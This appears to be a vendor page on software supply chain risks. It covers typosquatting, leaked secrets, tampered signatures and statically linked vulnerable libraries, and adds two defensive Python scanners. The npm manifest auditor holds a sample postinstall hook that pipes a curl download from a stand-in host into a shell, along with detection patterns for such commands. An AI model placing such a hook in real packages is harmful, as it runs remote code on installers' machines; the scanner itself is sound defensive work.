Typosquatting attacks prey on developers who mistype a package name during installation. While these attacks typically target developers or the development environment, this series of malicious NPM packages abuses the software supply chain to collect data from the unsuspecting end users of the software. IconBurst represents a significant escalation in attacker tactics that further undermines software supply chain security. It is the first software supply chain attack in the open source package ecosystem that triggers its payload only when the package is included in a software release.
Sensitive information leaks, such as tokens and credentials, can expose parts of the software development and distribution architecture to attackers. Unsigned software releases can be tampered with, or modified, to include backdoors or other malicious code. This is what happened to Codecov when one of the leaked credentials was abused to gain access to the software distribution platform. Any user who executed the malicious bash script had their sensitive information leaked to the attackers as well.
Maintainer account compromises can quickly escalate to impact the wider developer community. Even if the account is quickly restored, automated CI/CD systems may become compromised during the exposure window. This is what happened when the maintainer account of the popular ua-parser-js NPM package was compromised and the updated versions started serving malware.
Typosquatting attacks prey on developers who mistype a package name during installation. Developers are the primary target of such attacks, as their credentials can be misused to pivot through the organization. This is a common pattern found in most open source package repositories. Depending on their sophistication, attackers may even use off-the-shelf password recovery tools to collect credentials.
Typosquatting attacks prey on developers who mistype a package name during installation. Once installed, the packages automatically execute their code, giving malware the opportunity to achieve persistence. A malicious RubyGems package called atlas-client abused this to continuously monitor clipboard contents for digital currency wallet addresses. When one is detected, the malware replaces it with its own, hoping that the unsuspecting victim will transfer funds to attacker-controlled accounts.
Typosquatting attacks prey on developers who mistype a package name during installation. During package installation, the package's own installation functions are called to deploy it within the development environment. A malicious PyPI package called libpeshnx abused this to run its payload whenever an interactive non-login shell is created. In this case, the attacker can change the malicious payload at any time, since it is periodically downloaded from a remote server.
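The install-time execution that atlas-client and libpeshnx relied on has a visible footprint in the package manifest. As an added example (not the report tooling described on this page), the script below audits an npm package.json for lifecycle hooks that run during installation and notes traits such as remote downloads; the lifecycle event names are npm's real ones, while the sample manifest is constructed.

```python
"""Flag install-time lifecycle hooks in an npm package manifest."""
import json
import re

# npm lifecycle events that run automatically during `npm install`.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Traits worth a closer look in a hook that runs unattended at install time.
SUSPICIOUS = [
    (re.compile(r"\b(curl|wget)\b"), "downloads remote content"),
    (re.compile(r"\|\s*(sh|bash)\b"), "pipes into a shell"),
    (re.compile(r"\bnode\s+-e\b"), "evaluates inline JavaScript"),
    (re.compile(r"https?://"), "references a remote URL"),
]


def audit_manifest(manifest_text: str) -> list[dict]:
    """Return one finding per install hook present, with matched traits."""
    scripts = json.loads(manifest_text).get("scripts", {})
    findings = []
    for hook in INSTALL_HOOKS:
        if hook not in scripts:
            continue
        cmd = scripts[hook]
        reasons = [why for pat, why in SUSPICIOUS if pat.search(cmd)]
        findings.append({"hook": hook, "command": cmd, "reasons": reasons})
    return findings


# Constructed manifest: a benign prepare step beside a hook that fetches code.
SAMPLE_MANIFEST = json.dumps({
    "name": "example-pkg",
    "scripts": {
        "build": "tsc",
        "prepare": "npm run build",
        "postinstall": "curl -s http://example.invalid/setup.sh | sh",
    },
})

if __name__ == "__main__":
    for finding in audit_manifest(SAMPLE_MANIFEST):
        flag = "SUSPICIOUS" if finding["reasons"] else "review"
        print(f"[{flag}] {finding['hook']}: {finding['command']}")
        for reason in finding["reasons"]:
            print(f"    - {reason}")
```

Hooks with no matched trait are still listed, since any code that runs at install time deserves review before the package reaches a build system.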
Accidental inclusion of sensitive information, such as credentials or certificates, is quickly becoming the dominant way build environments get compromised. Safe secrets management is a challenge all developers face. Because secrets are used in so many ways during development, it is easy to accidentally include them in a release package or a container. Once the secrets are out in the open, attackers can easily misuse them to gain access, plant backdoors, and pivot from the build environment to production.
Digital signatures are applied to applications, packages and documents as a cryptographically secured authenticity record. Signatures verify the origin and the integrity of the object they are applied to. Any mismatch between the expected and the computed object hashes is reported as an integrity validation failure. This can be caused by data corruption, by developers changing content post-signing, or by an attacker tampering with the package. While finding the root cause is an incident response exercise, tracking the issue remediation is easily automated with our differential reports. This example report shows a Microsoft package that had a tampered signature issue resolved in a subsequent software version.
Most modern software is built on the shoulders of open source components. Managing critical vulnerabilities introduced to the code base by those third-party packages has become a daily chore for developers. When a critical remote code execution vulnerability hits the news, the questions of impact and exposure drive urgency and cause development teams to scramble. This is exactly what happened when a CVSS 10.0 vulnerability was found in a commonly used Java logging library - log4j.
When building software components, a developer has many options for interacting with third-party code. Static linking is one of the most common ways for vulnerabilities to get unexpectedly included in a large code base. The deeper your dependency tree goes, the more likely it is that a part of it will link to an outdated dependency that is statically linked. It is also very common to find multiple versions of the same dependency statically linked across components within a software package. This dependency version bifurcation exposes the application to unmanaged security risks. In the following example report, a NuGet package includes multiple statically linked versions of the OpenSSL and zlib libraries, both of which contain critical vulnerabilities.
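Version bifurcation of this kind can be spotted because OpenSSL and zlib compile version banners into their object code. As an added example (not the report tooling described on this page), the scanner below extracts those banners from each component in a package and reports every library that appears in more than one version; the banner formats are the ones the two libraries actually embed, while the sample "binaries" are constructed byte strings.

```python
"""Find statically linked OpenSSL/zlib copies and flag version bifurcation."""
import re
from collections import defaultdict

# Version banners OpenSSL and zlib embed as string constants in compiled code.
BANNERS = {
    "OpenSSL": re.compile(rb"OpenSSL (\d+\.\d+\.\d+[a-z]?)"),
    "zlib": re.compile(rb"(?:deflate|inflate) (\d+\.\d+\.\d+) Copyright"),
}


def find_versions(blob: bytes) -> dict[str, set[str]]:
    """Return {library: {versions}} for the banners found in one file."""
    found = defaultdict(set)
    for lib, pat in BANNERS.items():
        for match in pat.finditer(blob):
            found[lib].add(match.group(1).decode())
    return dict(found)


def bifurcation_report(files: dict[str, bytes]) -> dict[str, dict[str, set[str]]]:
    """Map library -> version -> files, keeping only libraries with >1 version."""
    by_lib = defaultdict(lambda: defaultdict(set))
    for name, blob in files.items():
        for lib, versions in find_versions(blob).items():
            for version in versions:
                by_lib[lib][version].add(name)
    return {lib: dict(vers) for lib, vers in by_lib.items() if len(vers) > 1}


# Constructed package contents: three components, each bundling its own copy.
SAMPLE_PACKAGE = {
    "lib/net.dll": (b"\x00OpenSSL 1.0.2k  26 Jan 2017\x00"
                    b"deflate 1.2.8 Copyright 1995-2013 Jean-loup Gailly "
                    b"and Mark Adler\x00"),
    "lib/tls.dll": b"\x00OpenSSL 1.1.1g  21 Apr 2020\x00",
    "lib/zip.dll": b"\x00inflate 1.2.11 Copyright 1995-2017 Mark Adler\x00",
}

if __name__ == "__main__":
    for lib, versions in bifurcation_report(SAMPLE_PACKAGE).items():
        print(f"{lib}: {len(versions)} distinct versions statically linked")
        for version, names in sorted(versions.items()):
            print(f"    {version}: {', '.join(sorted(names))}")
```

Each reported version can then be checked against the library's advisories separately, since a fix applied to one component leaves the other copies vulnerable.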